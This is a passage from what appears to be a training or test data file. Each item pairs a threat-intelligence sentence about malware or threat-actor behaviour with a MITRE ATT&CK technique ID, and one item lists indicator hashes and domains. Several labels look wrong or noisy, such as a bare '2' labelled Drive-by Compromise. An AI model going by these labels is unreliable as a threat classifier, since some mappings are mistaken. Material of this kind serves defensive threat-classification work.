0x3b, 0xc6, 0xee, 0x7c, 0xb9, 0xed, 0x91, 0x62}### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can hide its payload in BMP images hosted on compromised websites.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bash keeps track of the commands users type on the command-line with the ""history"" utility.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux can decrypt its configuration file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used DameWare Mini Remote Control for lateral movement.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use a file exfiltration tool to upload specific files to Dropbox.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty collects screenshots of the victim machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CreateProcess ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IMAP accounts in Outlook 2013 and POP accounts use Outlook Data Files as opposed to .ost, whereas IMAP accounts in Outlook 2016 use .ost files.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can list directory entries.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete captures audio from the computer’s microphone.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's Beacon payload is capable of capturing screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a file is uploaded, Machete will delete it from the machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VaporRage can use HTTP to download shellcode from compromised websites.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT is capable of deleting objects related to itself on the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has also obfuscated the AES key used for encryption.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can install itself as a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk attempts to reboot the machine by terminating specific processes.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke's miner connects to a C2 server using port 51640.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under .### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used PowerShell to download additional payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown can decode, decrypt, and decompress multiple layers of shellcode.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used the Plink utility and other tools to create tunnels to C2 servers.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can downloaded files from Dropbox using a hardcoded access token.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used port 444 when sending data about the system from the client to the server.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy's Delphi variant was packed with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo API.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can capture the victim's screen.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search DNS data to gather actionable information.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors .### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has created new services to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used a scheduled task to launch its PowerShell loader.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has been spread through malicious advertisements on websites.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows Vista and newer, the hash format is DCC2 hash, also known as MS-Cache v2 hash.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware .### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali can download payloads from remote C2 servers.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has digitally signed executables using AVAST Software certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa named a shellcode loader binary svchast.exe to spoof the legitimate svchost.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,2### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used base64 to encode payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can record the IP address of the target machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary injects its DLL file into a newly spawned Internet Explorer process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has checked the victim system's date and time to perform tasks during business hours .### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot leverages a custom packer to obfuscate its functionality.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS encoded C2 traffic with base64.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson has the ability to delete files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird checks for the presence of Bitdefender security software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also set a Startup path to launch the PowerShell shell command and download Cobalt Strike.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework., record audio### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can establish persistence via a Launch Daemon.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With authenticated access there are several tools that can be used to find accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google .### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy has used SEAL encryption during the initial C2 handshake.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Those assignments were not likely arbitrary, as this group had developed BlackEnergy2 for several years in a professional and organized style: Config with a similar set of plugins for different architectures Here is the list of retrieved files and related functionality: weap DDoS Attack (various types) ps password stealer handling a variety of network protocols (SMTP, POP3, IMAP, HTTP, FTP, Telnet) nm scans ports, stores banners snif logs IP source and destination, TCP/UDP ports hook main module: CnC communication, config parser, plugins loader uper rewrites hook module with a new version and launches it Weap, Snif, Nm plugin grammar mistakes and mis-spellings The developers’ coding style differed across the ‘Hook’ main module, the plugins, and the Windows main.dll### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS can use WMI to delete files on a target machine.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used batch scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use MSI files to execute DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target these repositories in order to collect large quantities of sensitive system administration data.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify visual content available internally or externally to an enterprise network.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency .### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary creates resources in an unused region, they may be able to operate undetected.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has used RAR to compress files before moving them outside of the victim network.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook has used legitimate web services to exfiltrate data.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dynamic-link libraries that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used regsvr32.exe to execute the malicious DLL.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors can use online resources and lookup tools to harvest information about certificates.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is followed by a number of Linux shell command style commands related to the malware establishing persistence### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Seth-Locker can execute commands via the command line shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used WMI to install malware on targeted systems.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can collect IP addresses and local intranet information from a victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The entire command structure gets compressed with zlib and then encrypted using a custom stream cipher.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cleaver has created fake LinkedIn profiles that included profile photos, details, and connections.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus collects the system information, including hostname and OS version, and sends it to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has the ability to capture RDP credentials by capturing the CredEnumerateA API Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SslMM sends the logged-on username to its hard-coded C2.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus has used malicious macros to download additional files to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For legacy programs, macOS executes /etc/bashrc on startup.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can use netstat and nbtstat to detect active network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has used a PowerShell script to install a shim database.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit can enumerate all running processes to compare hashes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can set up an HTTP or SOCKS proxy.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather the victim's IP addresses that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit has used DLL Search Order Hijacking to load oci.dll as a persistence mechanism.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has exfiltrated data over its C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has collected system information on the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has the capability to stop processes and services.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ngrok can be used to proxy connections to machines located behind NAT or firewalls.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has injected code into trusted processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY uploads data in 2048-byte chunks.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound used various social media channels as well as messaging services to spearphish victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete created their own directories to drop files into.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack can use Windows API's ConnectNamedPipe and WNetAddConnection2 to detect incoming connections and connect to remote shares.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to record audio from the compromised host.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to list open windows on the compromised host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise VPSs purchased by third-party entities.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can exfiltrate data over the primary C2 channel .### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wiarp creates a backdoor through which remote attackers can inject files into running processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has modified and added entries within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to maintain persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used HTTP POST requests to transmit data.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows allows logon scripts to be run whenever a specific user or group of users log into a system.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can download and execute new versions of itself.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can send time zone information from a compromised host to C2.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hide malicious Visual Basic for Applications payloads embedded within MS Office documents by replacing the VBA source code with benign data.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vasport can download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default all user accounts in the domain have permission to read GPOs.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many methods have been discovered to bypass UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect information about the currently logged in user by running whoami on a victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Following successful infiltration, the malware persists through registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run The command line execution leads to PowerShell code executed from a different registry value .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc performs data exfiltration over the control server channel using a custom protocol.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has changed the time stamp of certain files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has infected victims using watering holes.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These programs will be executed under the context of the user and will have the account's associated permissions level.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT shellcode decrypts and decompresses its RC4-encrypted payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If so, NETEAGLE will send beacons via an HTTP POST request.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader searches for files named logins.json to parse for credentials.### Assistant: T1552: Unsecured 